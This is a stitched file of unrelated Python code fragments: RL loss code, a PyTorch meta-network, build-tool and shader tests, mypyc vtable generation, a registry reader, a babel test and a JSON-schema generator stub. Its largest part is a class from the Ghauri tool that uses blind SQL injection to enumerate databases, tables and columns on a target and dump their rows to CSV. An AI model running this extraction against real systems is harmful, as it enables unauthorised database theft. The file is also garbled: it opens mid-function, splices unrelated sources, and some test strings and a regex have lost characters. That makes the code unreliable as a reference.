            losses = tf.stop_gradient(losses)
        l2_losses.append(losses)
    l2_losses = tf.stack(l2_losses, axis=0)
    # Index by role, then by (example, mode) to get one L2 scalar each.
    l2_losses = tf.gather(l2_losses, role_id)
    l2_losses = tf.gather_nd(l2_losses, idx)
    print(l2_losses.shape)
    # Per-role cost, each normalized by that role's example count.
    costs = []
    for i in range(1, 4):
        mask = tf.equal(role_id, i)
        l2_loss = tf.reduce_mean(tf.boolean_mask(l2_losses, mask), name=('l2_loss_%d' % i))
        pred_reward = tf.reduce_mean(tf.boolean_mask(value, mask), name=('predict_reward_%d' % i))
        true_reward = tf.reduce_mean(tf.boolean_mask(discounted_return, mask), name=('true_reward_%d' % i))
        advantage = tf.sqrt(tf.reduce_mean(tf.square(tf.boolean_mask(advantage_b, mask))), name=('rms_advantage_%d' % i))
        policy_loss = tf.reduce_sum(tf.boolean_mask(policy_loss_b, mask, name=('policy_loss_%d' % i)))
        entropy_loss = tf.reduce_sum(tf.boolean_mask(entropy_loss_b, mask, name=('entropy_loss_%d' % i)))
        value_loss = tf.reduce_sum(tf.boolean_mask(value_loss_b, mask, name=('value_loss_%d' % i)))
        cost = tf.add_n([policy_loss, (entropy_loss * entropy_beta), value_loss, l2_loss])
        cost = tf.truediv(cost, tf.reduce_sum(tf.cast(mask, tf.float32)), name=('cost_%d' % i))
        costs.append(cost)
        importance = tf.reduce_mean(tf.boolean_mask(importance_b, mask), name=('importance_%d' % i))
        add_moving_summary(policy_loss, entropy_loss, value_loss, pred_reward, true_reward, advantage, cost, importance, decay=0)
    return tf.add_n(costs)
def optimizer(self):
    """Return an Adam optimizer with per-gradient average-norm clipping.

    The learning rate is exposed as a non-trainable variable so it can be
    adjusted externally (e.g. by a schedule callback).
    """
    learning_rate = tf.get_variable('learning_rate', initializer=0.0001, trainable=False)
    adam = tf.train.AdamOptimizer(learning_rate)
    clip_grad = MapGradient(lambda g: tf.clip_by_average_norm(g, 0.3))
    return optimizer.apply_grad_processors(adam, [clip_grad])
class VNet(MetaModule):
    """Small two-layer meta-MLP producing outputs in (0, 1).

    Architecture: Linear -> ReLU -> Linear -> sigmoid, built from
    ``MetaLinear`` layers so its parameters can be meta-updated.

    Args:
        input: number of input features.
        hidden: hidden-layer width.
        output: number of output units.
    """

    def __init__(self, input, hidden, output):
        super(VNet, self).__init__()
        self.linear1 = MetaLinear(input, hidden)
        self.relu = nn.ReLU(inplace=True)
        self.linear2 = MetaLinear(hidden, output)

    def forward(self, x):
        """Run the forward pass; returns sigmoid-squashed activations."""
        x = self.linear1(x)
        x = self.relu(x)
        out = self.linear2(x)
        # torch.nn.functional.sigmoid is deprecated (removed in newer
        # PyTorch releases); the Tensor method is the supported equivalent
        # and requires no additional import.
        return out.sigmoid()
class GhauriAdvance():
    """Blind/inferential SQL-injection data-extraction routines.

    Every public method follows the same three-step pattern:
    1) count the target entries with a COUNT payload,
    2) probe for a working extraction payload (``query_check=True``),
    3) loop over offsets pulling one entry per request.

    Each method returns a ``collections.namedtuple`` ``Response`` whose
    ``ok`` flag reports whether anything was retrieved.
    """
    def __execute_expression(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, suppress_output=False, query_check=False, list_of_chars=None, not_match_string=None, code=None, text_only=False, dump_type=None):
        """Delegate one extraction round to ghauri_extractor.fetch_characters.

        NOTE(review): ``not_match_string``, ``code`` and ``text_only`` are
        accepted here but not forwarded to ``fetch_characters`` -- confirm
        whether that is intentional.
        """
        retval = ghauri_extractor.fetch_characters(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, payloads=payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack, match_string=match_string, suppress_output=suppress_output, query_check=query_check, list_of_chars=list_of_chars, dump_type=dump_type)
        return retval
    def fetch_dbs(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, batch=False, not_match_string=None, code=None, text_only=False):
        """Enumerate database names on the target DBMS.

        Returns a ``Response(ok, error, result)`` where ``result`` is the
        collection of retrieved database names.
        """
        # --start is presumably 1-based on the CLI; convert to a 0-based
        # offset except for Oracle (handled separately below) -- TODO confirm.
        if ((start != 0) and (start > 0)):
            if (backend != 'Oracle'):
                start = (start - 1)
        logger.info('fetching database names')
        Response = collections.namedtuple('Response', ['ok', 'error', 'result'])
        _results = set()
        _temp = Response(ok=False, error='', result=[])
        logger.info('fetching number of databases')
        payloads_count = PAYLOADS_DBS_COUNT.get(backend)
        retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
        if (not retval.ok):
            # Fallback path: on MSSQL, when counting fails, iterate DB_NAME(n)
            # blindly until several consecutive misses (null_counter_limit).
            if (backend == 'Microsoft SQL Server'):
                logger.debug('ghauri could not determine number of databases, using DB_NAME to fetch dbs ..')
                payloads_names = PAYLOADS_DBS_NAMES.get(backend)
                payload = None
                total = 0
                guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
                if guess.ok:
                    payload = guess.payload
                    logger.debug(f"Working payload found for database extraction: '{payload}'")
                if (not payload):
                    logger.critical('Ghauri was not able identify payload for database(s) fetching, try manually.')
                    return _temp
                payload = clean_up_offset_payload(payload, backend=backend)
                null_counter_limit = 0
                # Hard upper bound of 20 databases for this blind fallback.
                stop = 20
                while (start < stop):
                    if (null_counter_limit == 3):
                        logger.debug('limit reached..')
                        break
                    _payload = payload.format(offset=start)
                    payloads = [_payload]
                    retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only)
                    if retval.ok:
                        if (retval.result not in _results):
                            logger.debug(('retrieved: %s' % retval.result))
                            _results.add(retval.result)
                    else:
                        # Count consecutive misses; three in a row ends the scan.
                        null_counter_limit += 1
                    start += 1
                if _results:
                    _results = list(set(list(_results)))
                    total = len(_results)
                    logger.info(('retrieved: %s' % total))
                    for db in _results:
                        logger.info(('retrieved: %s' % db))
                    _temp = Response(ok=True, error='', result=_results)
                    logger.success(f'available databases [{total}]:')
                    for db in _results:
                        logger.success(f'[*] {db}')
                else:
                    logger.warning('the SQL query provided does not return any output')
                    logger.error('unable to retrieve the number of databases')
            return _temp
        if retval.ok:
            total = 0
            if retval.result.isdigit():
                total = int(retval.result)
            logger.info(('retrieved: %s' % total))
            if (total == 0):
                logger.warning('the SQL query provided does not return any output')
                logger.error('unable to retrieve the number of databases')
            if (total > 0):
                # Clamp the user-supplied --stop to the discovered total.
                if (not stop):
                    stop = total
                elif (stop and (stop > 0)):
                    if (stop > total):
                        logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
                        stop = total
                else:
                    stop = total
                payloads_names = PAYLOADS_DBS_NAMES.get(backend)
                payload = None
                guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
                if guess.ok:
                    payload = guess.payload
                    logger.debug(f"Working payload found for database extraction: '{payload}'")
                if (not payload):
                    logger.critical('Ghauri was not able identify payload for database(s) fetching, try manually.')
                    return _temp
                payload = clean_up_offset_payload(payload, backend=backend)
                # DB_NAME()-style MSSQL payloads are 1-based; widen the window.
                if (payload and (backend == 'Microsoft SQL Server') and ('DB_NAME' in payload)):
                    stop = (stop + 1)
                # Oracle ROWNUM offsets are 1-based; shift the window by one.
                if ((start == 0) and (backend == 'Oracle')):
                    start = (1 if (start == 0) else start)
                    stop = ((total + 1) if (stop == total) else (stop + 1))
                while (start < stop):
                    payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload)
                    try:
                        retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_dbs')
                        if retval.ok:
                            if (retval.result not in _results):
                                if retval.resumed:
                                    logger.info(('resumed: %s' % retval.result))
                                else:
                                    logger.info(('retrieved: %s' % retval.result))
                                _results.add(retval.result)
                        if ((not retval.ok) and (retval.error == 'user_ended')):
                            break
                    except KeyboardInterrupt:
                        quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
                        # NOTE(review): only a lowercase 'n' aborts here --
                        # confirm read_input normalizes case.
                        if (quest == 'n'):
                            break
                    start += 1
                if _results:
                    _temp = Response(ok=True, error='', result=_results)
                    logger.success(f'available databases [{total}]:')
                    for db in _results:
                        logger.success(f'[*] {db}')
        return _temp
    def fetch_tables(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, database=None, batch=False, not_match_string=None, code=None, text_only=False):
        """Enumerate table names within ``database``.

        Returns a ``Response(ok, error, database, result)``.
        """
        # Convert 1-based --start to 0-based offset (non-Oracle backends).
        if ((start != 0) and (start > 0)):
            if (backend != 'Oracle'):
                start = (start - 1)
        logger.info(f'fetching tables for database: {database}')
        Response = collections.namedtuple('Response', ['ok', 'error', 'database', 'result'])
        _results = set()
        _temp = Response(ok=False, error='', database=database, result=[])
        logger.info(f"fetching number of tables for database '{mc}{database}{nc}'")
        payloads_count = PAYLOADS_TBLS_COUNT.get(backend)
        payloads_count = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_count, is_string=conf.is_string)
        retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
        if retval.ok:
            total = 0
            if retval.result.isdigit():
                total = int(retval.result)
            logger.info(('retrieved: %s' % total))
            if (total == 0):
                logger.warning(f"database '{database}' appears to be empty")
                logger.warning('the SQL query provided does not return any output')
            if (total > 0):
                # Clamp --stop to the discovered total.
                if (not stop):
                    stop = total
                elif (stop and (stop > 0)):
                    if (stop > total):
                        logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
                        stop = total
                else:
                    stop = total
                payloads_names = PAYLOADS_TBLS_NAMES.get(backend)
                payloads_names = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_names, is_string=conf.is_string)
                payload = None
                guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
                if guess.ok:
                    payload = guess.payload
                    logger.debug(f"Working payload found for table(s) extraction: '{payload}'")
                if (not payload):
                    logger.critical('Ghauri was not able identify payload for table(s) fetching, try manually.')
                    return _temp
                payload = clean_up_offset_payload(payload, backend=backend)
                # Oracle ROWNUM offsets are 1-based; shift the window by one.
                if ((start == 0) and (backend == 'Oracle')):
                    start = (1 if (start == 0) else start)
                    stop = ((total + 1) if (stop == total) else (stop + 1))
                while (start < stop):
                    payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload)
                    try:
                        retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_{database}_tables')
                        if retval.ok:
                            if retval.resumed:
                                logger.info(('resumed: %s' % retval.result))
                            else:
                                logger.info(('retrieved: %s' % retval.result))
                            if (retval.result not in _results):
                                _results.add(retval.result)
                        if ((not retval.ok) and (retval.error == 'user_ended')):
                            break
                    except KeyboardInterrupt:
                        quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
                        if (quest == 'n'):
                            break
                    start += 1
                if _results:
                    _temp = Response(ok=True, error='', database=database, result=_results)
                    ret = prettifier(cursor_or_list=_results, field_names='Tables')
                    logger.success(f'Database: {database}')
                    logger.success(f'[{ret.entries} tables]')
                    logger.success(f'{ret.data}')
        return _temp
    def fetch_columns(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, database=None, table=None, batch=False, not_match_string=None, code=None, text_only=False):
        """Enumerate column names of ``table`` within ``database``.

        Returns a ``Response(ok, error, database, table, result)``.
        """
        # Convert 1-based --start to 0-based offset (non-Oracle backends).
        if ((start != 0) and (start > 0)):
            if (backend != 'Oracle'):
                start = (start - 1)
        logger.info(f"fetching columns for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
        Response = collections.namedtuple('Response', ['ok', 'error', 'database', 'table', 'result'])
        _results = []
        _temp = Response(ok=False, error='', database=database, table=table, result=[])
        logger.info(f"fetching number of columns for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
        payloads_count = PAYLOADS_COLS_COUNT.get(backend)
        # MSSQL system catalogs are queried without schema prefixes.
        if (backend == 'Microsoft SQL Server'):
            table = table.replace('dbo.', '').replace('sys.', '')
        payloads_count = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_count, table=table)
        retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
        if retval.ok:
            total = 0
            if retval.result.isdigit():
                total = int(retval.result)
            logger.info(('retrieved: %s' % total))
            if (total == 0):
                logger.warning('the SQL query provided does not return any output')
            if (total > 0):
                # Clamp --stop to the discovered total.
                if (not stop):
                    stop = total
                elif (stop and (stop > 0)):
                    if (stop > total):
                        logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
                        stop = total
                else:
                    stop = total
                payloads_names = PAYLOADS_COLS_NAMES.get(backend)
                payloads_names = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_names, table=table, is_string=conf.is_string)
                payload = None
                guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
                if guess.ok:
                    payload = guess.payload
                    logger.debug(f"Working payload found for column(s) extraction: '{payload}'")
                if (not payload):
                    logger.critical('Ghauri was not able identify payload for column(s) fetching, try manually.')
                    return _temp
                payload = clean_up_offset_payload(payload, backend=backend)
                # Oracle ROWNUM offsets are 1-based; shift the window by one.
                if ((start == 0) and (backend == 'Oracle')):
                    start = (1 if (start == 0) else start)
                    stop = ((total + 1) if (stop == total) else (stop + 1))
                while (start < stop):
                    payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload)
                    try:
                        retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_{database}_{table}_columns')
                        if retval.ok:
                            if retval.resumed:
                                logger.info(('resumed: %s' % retval.result))
                            else:
                                logger.info(('retrieved: %s' % retval.result))
                            _results.append(retval.result)
                        if ((not retval.ok) and (retval.error == 'user_ended')):
                            break
                    except KeyboardInterrupt:
                        quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
                        if (quest == 'n'):
                            break
                    start += 1
                if _results:
                    _temp = Response(ok=True, error='', database=database, table=table, result=_results)
                    ret = prettifier(_results, field_names='Columns')
                    logger.success(f'Database: {database}')
                    logger.success(f'Table: {table}')
                    logger.success(f'[{ret.entries} columns]')
                    logger.success(f'{ret.data}')
        return _temp
    def dump_table(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, database=None, table=None, columns=None, batch=False, not_match_string=None, code=None, text_only=False):
        """Dump the requested ``columns`` of ``table`` row by row.

        Each row is fetched one column at a time; only fully-retrieved rows
        (all columns present) are kept.  Results are also written to CSV via
        the session store.  Returns ``Response(ok, error, database, table,
        result)`` where ``result`` is a list of rows (lists of values).
        """
        __columns = to_list(columns)
        # Convert 1-based --start to 0-based offset (non-Oracle backends).
        if ((start != 0) and (start > 0)):
            if (backend != 'Oracle'):
                start = (start - 1)
        logger.info(f"fetching entries of column(s) '{mc}{columns}{bw}' for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
        Response = collections.namedtuple('Response', ['ok', 'error', 'database', 'table', 'result'])
        _results = []
        _temp = Response(ok=False, error='', database=database, table=table, result=[])
        logger.info(f"{bw}fetching number of column(s) '{mc}{columns}{bw}' entries for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
        payloads_count = PAYLOADS_RECS_COUNT.get(backend)
        # MSSQL row-count payloads key off one column; the last one is used.
        _column = (__columns[(- 1)] if (backend == 'Microsoft SQL Server') else None)
        payloads_count = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_count, table=table, column=_column, dump=True)
        retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
        if retval.ok:
            total = 0
            if retval.result.isdigit():
                total = int(retval.result)
            logger.info(('retrieved: %s' % total))
            if (total == 0):
                logger.warning('the SQL query provided does not return any output')
            if (total > 0):
                # Clamp --stop to the discovered total.
                if (not stop):
                    stop = total
                elif (stop and (stop > 0)):
                    if (stop > total):
                        logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
                        stop = total
                else:
                    stop = total
                payloads_names = PAYLOADS_RECS_DUMP.get(backend)
                payloads_names = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_names, table=table, column=__columns[(- 1)], dump=True)
                payload = None
                guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
                if guess.ok:
                    payload = guess.payload
                    logger.debug(f"Working payload found for table dump: '{payload}'")
                if (not payload):
                    logger.critical('Ghauri was not able identify payload for table dump, try manually.')
                    return _temp
                payload = clean_up_offset_payload(payload, backend=backend, column=__columns[(- 1)])
                if (backend == 'Microsoft SQL Server'):
                    # LIMIT-emulating MSSQL payloads are 1-based; widen window.
                    if ('LIMIT=' in payload):
                        stop = ((total + 1) if (stop == total) else (stop + 1))
                        start = (1 if (start == 0) else start)
                    # No usable row-offset predicate: assume a single row.
                    if payload.endswith('WHERE 1=1)'):
                        logger.warning('it was not possible to dump all of the entries for the SQL query provided. Ghauri will assume that it returns only one entry')
                        start = 1
                        stop = 2
                # Oracle ROWNUM offsets are 1-based; shift the window by one.
                if ((start == 0) and (backend == 'Oracle')):
                    start = (1 if (start == 0) else start)
                    stop = ((total + 1) if (stop == total) else (stop + 1))
                while (start < stop):
                    __temp = []
                    is_user_ended = False
                    is_interrupted = False
                    # One request per column for the current row offset.
                    for column_name in __columns:
                        payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload, column_name=column_name)
                        try:
                            retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_{database}_{table}_{column_name}_dump')
                            if retval.ok:
                                if (retval.result not in __temp):
                                    if retval.resumed:
                                        logger.info(('resumed: %s' % retval.result))
                                    else:
                                        logger.info(('retrieved: %s' % retval.result))
                                    __temp.append(retval.result)
                            if ((not retval.ok) and (retval.error == 'user_ended')):
                                is_user_ended = True
                                break
                        except KeyboardInterrupt:
                            quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
                            if (quest == 'n'):
                                is_interrupted = True
                                break
                    if is_user_ended:
                        break
                    # Keep the row only when every requested column was
                    # retrieved (deduplication in __temp can drop columns
                    # with identical values -- see the membership check above).
                    if __temp:
                        if (len(__temp) == len(__columns)):
                            _results.append(__temp)
                    if is_interrupted:
                        break
                    start += 1
                if _results:
                    _temp = Response(ok=True, error='', database=database, table=table, result=_results)
                    ret = prettifier(_results, field_names=columns, header=True)
                    logger.success(f'Database: {database}')
                    logger.success(f'Table: {table}')
                    logger.success(f'[{ret.entries} entries]')
                    logger.success(f'{ret.data}')
                    # Best-effort CSV export; failures are logged, not raised.
                    try:
                        session.dump_to_csv(_results, field_names=__columns, filepath=conf.session_filepath, database=database, table=table)
                    except Exception as error:
                        logger.debug(error)
        return _temp
.requires_internet
def test_sync_project_dependencies(hatch, helpers, temp_dir, config_file):
    """End-to-end check that `hatch run` syncs newly added project
    dependencies into an existing environment before executing the command.

    Requires internet access: the added dependency ('binary') is installed
    from the package index during the sync step.
    """
    # Disable test-suite scaffolding in the generated project template.
    config_file.model.template.plugins['default']['tests'] = False
    config_file.save()
    project_name = 'My.App'
    with temp_dir.as_cwd():
        result = hatch('new', project_name)
    assert (result.exit_code == 0), result.output
    project_path = (temp_dir / 'my-app')
    data_path = (temp_dir / 'data')
    data_path.mkdir()
    with project_path.as_cwd(env_vars={ConfigEnvVars.DATA: str(data_path)}):
        result = hatch('env', 'create', 'default')
        assert (result.exit_code == 0), result.output
        assert (result.output == helpers.dedent('\n            Creating environment: default\n            Installing project in development mode\n            Checking dependencies\n            '))
    # Verify the on-disk layout of the created virtual environment:
    # data/env/virtual/<project>/<8-char hash>/<project>.
    env_data_path = ((data_path / 'env') / 'virtual')
    assert env_data_path.is_dir()
    project_data_path = (env_data_path / project_path.name)
    assert project_data_path.is_dir()
    storage_dirs = list(project_data_path.iterdir())
    assert (len(storage_dirs) == 1)
    storage_path = storage_dirs[0]
    assert (len(storage_path.name) == 8)
    env_dirs = list(storage_path.iterdir())
    assert (len(env_dirs) == 1)
    env_path = env_dirs[0]
    assert (env_path.name == project_path.name)
    # Add a new dependency after the environment already exists.
    project = Project(project_path)
    config = dict(project.raw_config)
    config['project']['dependencies'] = ['binary']
    project.save_config(config)
    with project_path.as_cwd(env_vars={ConfigEnvVars.DATA: str(data_path)}):
        # `hatch run` must detect and sync the new dependency, then run the
        # command that imports it and writes its output to a file.
        result = hatch('run', 'python', '-c', "import binary,pathlib,sys;pathlib.Path('test.txt').write_text(str(binary.convert_units(1024)))")
        assert (result.exit_code == 0), result.output
        assert (result.output == helpers.dedent('\n            Checking dependencies\n            Syncing dependencies\n            '))
    output_file = (project_path / 'test.txt')
    assert output_file.is_file()
    assert (str(output_file.read_text()) == "(1.0, 'KiB')")
def test_varyings_struct_position1():
    """resolve_varyings inserts a Varyings struct definition ahead of the
    shader entry points when the struct is referenced but not declared."""
    source = '\n fn vs_main() -> Varyings {\n }\n fn fs_main(varyings : Varyings) {\n }\n '
    expected = '\n struct Varyings {\n };\n\n fn vs_main() -> Varyings {\n }\n fn fs_main(varyings : Varyings) {\n }\n '
    resolved = resolve_varyings(source)
    assert resolved.strip() == expected.strip()
def generate_vtables(base: ClassIR, vtable_setup_name: str, vtable_name: str, emitter: Emitter, shadow: bool) -> str:
    """Emit C declarations for a class's vtable (plus one vtable and offset
    table per implemented trait) and the setup function that fills them in.

    Args:
        base: the class whose vtables are generated.
        vtable_setup_name: name of the emitted setup function.
        vtable_name: name of the emitted main vtable array.
        emitter: C code emitter to write into.
        shadow: when True, generate the "shadow" variant used to support
            interpreted subclasses.

    Returns:
        The C expression callers should use to reference the vtable: the
        bare array name, or an offset past the trait-subtable headers when
        trait subtables precede the main entries.
    """
    def trait_vtable_name(trait: ClassIR) -> str:
        # Per-(class, trait) vtable array name; '_shadow' suffix for the
        # shadow variant.
        return '{}_{}_trait_vtable{}'.format(base.name_prefix(emitter.names), trait.name_prefix(emitter.names), ('_shadow' if shadow else ''))
    def trait_offset_table_name(trait: ClassIR) -> str:
        # Per-(class, trait) attribute-offset table name.
        return '{}_{}_offset_table'.format(base.name_prefix(emitter.names), trait.name_prefix(emitter.names))
    # Declare the arrays first (max(1, ...) avoids zero-length C arrays).
    # The main vtable reserves 3 slots per trait subtable ahead of the
    # regular entries.
    emitter.emit_line('static CPyVTableItem {}[{}];'.format(vtable_name, max(1, (len(base.vtable_entries) + (3 * len(base.trait_vtables))))))
    for (trait, vtable) in base.trait_vtables.items():
        emitter.emit_line(f'static CPyVTableItem {trait_vtable_name(trait)}[{max(1, len(vtable))}];')
        emitter.emit_line('static size_t {}[{}];'.format(trait_offset_table_name(trait), max(1, len(trait.attributes))))
    # Setup function: populates all of the arrays declared above.
    emitter.emit_line('static bool')
    emitter.emit_line(f'{NATIVE_PREFIX}{vtable_setup_name}(void)')
    emitter.emit_line('{')
    if (base.allow_interpreted_subclasses and (not shadow)):
        # The non-shadow setup also initializes the shadow tables.
        emitter.emit_line(f'{NATIVE_PREFIX}{vtable_setup_name}_shadow();')
    subtables = []
    for (trait, vtable) in base.trait_vtables.items():
        name = trait_vtable_name(trait)
        offset_name = trait_offset_table_name(trait)
        generate_vtable(vtable, name, emitter, [], shadow)
        generate_offset_table(offset_name, emitter, trait, base)
        subtables.append((trait, name, offset_name))
    generate_vtable(base.vtable_entries, vtable_name, emitter, subtables, shadow)
    emitter.emit_line('return 1;')
    emitter.emit_line('}')
    # With subtables the usable vtable starts after the 3-slot-per-trait
    # header region.
    return (vtable_name if (not subtables) else f'{vtable_name} + {(len(subtables) * 3)}')
def read_values(base, key):
    """Return all registry values under ``base\\key`` as a dict, or None.

    Value names are lowercased; both names and data are passed through
    convert_mbcs.  Returns None when the key cannot be opened.
    """
    try:
        hkey = RegOpenKeyEx(base, key)
    except RegError:
        return None
    values = {}
    index = 0
    # Enumerate until RegEnumValue runs out of entries.
    while True:
        try:
            entry_name, entry_data, _entry_type = RegEnumValue(hkey, index)
        except RegError:
            break
        values[convert_mbcs(entry_name.lower())] = convert_mbcs(entry_data)
        index += 1
    return values
def test_format_skeleton(timezone_getter):
    # Verify skeleton-based date formatting across locales and timezones.
    dt = datetime(2007, 4, 1, 15, 30)
    assert (dates.format_skeleton('yMEd', dt, locale='en_US') == 'Sun, 4/1/2007')
    # NOTE(review): the Thai ('th') expected strings below look truncated --
    # the non-ASCII (Thai script) characters appear to have been stripped
    # from this file.  Confirm against babel's CLDR data before trusting them.
    assert (dates.format_skeleton('yMEd', dt, locale='th') == '. 1/4/2007')
    assert (dates.format_skeleton('EHm', dt, locale='en') == 'Sun 15:30')
    assert (dates.format_skeleton('EHm', dt, tzinfo=timezone_getter('Asia/Bangkok'), locale='th') == '. 22:30 .')
class CodeGeneratorDraft04(CodeGenerator):
    """Generate Python validation code for JSON Schema draft-04 documents.

    Each ``generate_*`` method emits source lines (via ``self.l`` /
    ``self.exc``) that validate one schema keyword against the current
    variable.  Regexes needed by ``pattern``/``format``/``patternProperties``
    are pre-compiled into ``self._compile_regexps`` so the generated code can
    look them up through ``REGEX_PATTERNS`` at run time.
    """
    # Regular expressions backing the built-in "format" keywords.
    # NOTE(review): the 'email' regex looks garbled -- upstream fastjsonschema
    # uses '^[^@]+@[^@]+\\.[^@]+\\Z' and the '@' characters appear to have
    # been stripped from this file; verify before relying on it.
